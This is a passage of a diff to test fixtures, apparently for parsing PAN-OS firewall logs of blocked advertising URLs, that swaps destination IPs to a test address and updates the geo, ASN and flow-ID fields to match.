16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -5052,7 +5112,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:b3MpSidntZseAvCtO89765ETlyI=" + "community_id": "1:2B3KDgrQ/ZoQIB3taLKfajXpk6Y=" } }, "threat_category": "unknown", @@ -5097,8 +5157,8 @@ ], "network": { "community_id": [ - "1:2dLIQC1NuJw/6kPkSukOc7rN5UE=", - "1:b3MpSidntZseAvCtO89765ETlyI=" + "1:YhRsCDiztXE3cQjKOdwAryGZjyI=", + "1:2B3KDgrQ/ZoQIB3taLKfajXpk6Y=" ], "transport": "tcp", "application": "ssl", @@ -5137,14 +5197,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768048951Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691820Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -5167,26 +5227,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5202,14 +5264,14 @@ "port": 53022, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -5224,7 +5286,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:wug3mTERsDOMF1R52vDi6SpWbMc=" + "community_id": "1:aRZdUQvYlLZFrlb7FLXpZAYGfVI=" } }, "threat_category": "unknown", @@ -5269,8 +5331,8 @@ ], "network": { "community_id": [ - "1:39KkS/Y1cEc0OLIWR3+26TPoFhQ=", - "1:wug3mTERsDOMF1R52vDi6SpWbMc=" + "1:BAGriF5s1csL/VlVgarVgTrQNTw=", + "1:aRZdUQvYlLZFrlb7FLXpZAYGfVI=" ], "transport": "tcp", "application": "ssl", @@ -5309,14 +5371,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768052923Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691826300Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -5339,26 +5401,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5374,14 +5438,14 @@ "port": 53023, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -5396,7 +5460,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:ktdKYACJa2q76tdS55sj5QaeMBs=" + "community_id": "1:9JWJBlFbim2f2OICXHWgHHii6q4=" } }, "threat_category": "unknown", @@ -5441,8 +5505,8 @@ ], "network": { "community_id": [ - "1:IFLzwMkLmz8UfCYPFfRgTIBIzSI=", - "1:ktdKYACJa2q76tdS55sj5QaeMBs=" + "1:ttfpme4pbkQ5E2nFXYrZVqA+aZY=", + "1:9JWJBlFbim2f2OICXHWgHHii6q4=" ], "transport": "tcp", "application": "ssl", @@ -5481,14 +5545,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768056840Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691832800Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -5511,26 +5575,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5546,14 +5612,14 @@ "port": 53024, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -5568,7 +5634,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:sWvGFBOOisURcvYe5nB5HUSa6B8=" + "community_id": "1:Vj0ncZbiWrNwetDfc4ldV/QmVpA=" } }, "threat_category": "unknown", @@ -5613,8 +5679,8 @@ ], "network": { "community_id": [ - "1:spPQtp0F92JeXKXtvGndU6vymNo=", - "1:sWvGFBOOisURcvYe5nB5HUSa6B8=" + "1:f10dPKu04WLfR0Y2pmXGZ8O/2UI=", + "1:Vj0ncZbiWrNwetDfc4ldV/QmVpA=" ], "transport": "tcp", "application": "ssl", @@ -5653,14 +5719,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768060783Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691839300Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -5683,26 +5749,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5718,14 +5786,14 @@ "port": 53025, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -5740,7 +5808,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:LHZawFx+zgZPTd01rJqX/31kNmE=" + "community_id": "1:KptNUPxZMb3gPTIXS6Sjj5oM7aM=" } }, "threat_category": "unknown", @@ -5785,8 +5853,8 @@ ], "network": { "community_id": [ - "1:xBwOt7zrEs9oyuV1oEHKLKXdg1Q=", - "1:LHZawFx+zgZPTd01rJqX/31kNmE=" + "1:8HL74AAev4o2qF0UiITHmvOh/B4=", + "1:KptNUPxZMb3gPTIXS6Sjj5oM7aM=" ], "transport": "tcp", "application": "ssl", @@ -5825,14 +5893,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768064729Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691845600Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -5855,26 +5923,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5890,14 +5960,14 @@ "port": 53026, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -5912,7 +5982,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:XcghkvaiKIQS/KgINx7Mb5Vvn3M=" + "community_id": "1:OXaDfs1yeGdJJKApbFP+T+Gd65c=" } }, "threat_category": "unknown", @@ -5957,8 +6027,8 @@ ], "network": { "community_id": [ - "1:z5jHjldbSP1U0TqDWR9Uox2k3Js=", - "1:XcghkvaiKIQS/KgINx7Mb5Vvn3M=" + "1:RkWNOdn0i8fkKzeJPYWl3p6lgaE=", + "1:OXaDfs1yeGdJJKApbFP+T+Gd65c=" ], "transport": "tcp", "application": "ssl", @@ -5997,14 +6067,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768068899Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691852100Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6027,26 +6097,28 @@ "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 54113, + "number": 4837, "organization": { - "name": "Fastly" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6062,14 +6134,14 @@ "port": 53041, "ip": "192.168.15.224" }, - "message": "192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -6084,7 +6156,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:XdO4yHx+1HZM4GcutRTyur9ixdM=" + "community_id": "1:QuW2mKBVd/fGyGz7iVybGH8VU7c=" } }, "threat_category": "unknown", @@ -6129,8 +6201,8 @@ ], "network": { "community_id": [ - "1:tQxUFWF1PJh9XS+U53oZgNQELoA=", - "1:XdO4yHx+1HZM4GcutRTyur9ixdM=" + "1:qjyk/WSSoSLvg7t9MnFFd+phtoQ=", + "1:QuW2mKBVd/fGyGz7iVybGH8VU7c=" ], "transport": "tcp", "application": "ssl", @@ -6169,14 +6241,14 @@ ], "ip": [ "192.168.15.224", - "151.101.2.2", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768101095Z", - "original": "Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691858600Z", + "original": "Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:53.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6199,29 +6271,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.192.7.152" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Washington", + "region_name": "Jilin", "location": { - "lon": -122.3303, - "lat": 47.6109 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.192.7.152" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6237,14 +6308,14 @@ "port": 53040, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": 